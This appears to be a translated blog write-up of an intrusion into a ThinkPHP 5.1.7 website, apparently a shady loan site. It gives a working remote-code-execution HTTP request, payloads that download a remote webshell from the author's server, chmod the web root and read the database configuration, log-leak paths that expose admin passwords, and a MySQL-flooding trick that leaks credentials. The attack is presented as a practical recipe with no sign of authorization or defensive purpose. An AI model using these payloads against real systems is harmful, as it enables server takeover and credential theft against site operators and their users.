Remember a practical penetration of the ThinkPHP framework

Information collection

Find a website http://x.x.x.x/ and start penetrating it

First use nmap to scan the port open to the victim server to detect the port

You can see the open ports as follows

The port is the unique identification id of the application in computer communication. Through the port we You can know what services are opened by the victim server

For example, 3306 is mysql and has enabled external connections. Next, we will check the port access to see what services are opened.

8080 has opened phpmyadmin. We can use the PHP connection mysql tool to crack the mysql password

8082 is a loan homepage

Enter any number that is not Existing routes and then check the error information such as http://x.x.x.x/gfvhf

## Successful error: The version of the thinkphp framework is 5.1.7 (this version has an injection vulnerability)

8084 is a background that continues to collect

8092 is a background, because the deployment is not standardized, there is thinkphp log leakage, the path is http ://x.x.x.x:8092/runtime/log/202112/19.log You can check the account and password that the administrator has logged in to.

Here we talk about black products using the thinkphp framework. Because the operation and maintenance is half-baked, it is very likely that the thinkphp log will be leaked

tp5-6 payload: domain name/runtime/log/202112/19.log (

The following 202112/19.log changes based on the current date)

tp3 payload: Domain name/Application/Runtime/Logs/Home/21_12_19.log (

The following 21_12_19.log is According to the )

################ ### ###############Information collection completed and precise attack######Open burp, then use packet capture, and then forward the data packet to the Repeater module of burp to capture the packet content Replace it with the following content ###### The principle of the vulnerability will not be explained in detail. No PHP architecture layer can understand it. A brief description is that a variable overwrite causes code execution. ######Thinkphp5 vulnerability poc can refer to https://y4er.com/post/thinkphp5-rce/######The content of the following packet is to trigger the vulnerability and let the server Execute phpinfo()###

POST /index.php?s=captcha&echod=phpinfo() HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=iar4j14536rat57j1d5018qjtt8vj69g
Content-Type:application/x-www-form-urlencoded
Content-Length: 77

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod

###The execution is successful and you can see some detailed information of php##############Start writing the shell below and replace the request header with: ## #

POST /index.php s=captcha&echod=copy('http://x.x.x.x/2.txt','t2.php') HTTP/1.1

###It means to download the remote shell file http://x.x.x.x/2.txt on my server and write it to t2.php in the current web directory######But when I visit t2.php, When a 404 appears, I guess it means that the current directory does not have write permissions######So I tried to give write permissions:###

POST /index.php?s=captcha&echod=chmod('./',0777) HTTP/1.1

###I found that I still couldn’t write the shell, and the PHP permissions were very low. ######Replace chmod('./',0777) with readfile('../application/database.php') to read the database configuration file. It was found that the mysql account password was successfully obtained. ###############Use the phpmyadmin service we discovered before to log in and then open mysql for external connection######Use the mysql management tool to connect and find a bunch of databases. And mysql directly has root permissions, which can elevate the server (lateral penetration of the intranet), etc. Anyway, the external network has opened an opening, so I won’t go into depth here. ############

Summary

Summarize some of the ideas I have figured out myself: if thinkphp turns on debug mode and the server turns on database external connections, it can send a large number of requests by blasting the mysql service (Let mysql block up), when the thinkphp connection to mysql times out, a connection exception error will be reported, and the mysql account password will be output to the page.

Recommended study: "thinkphp video tutorial"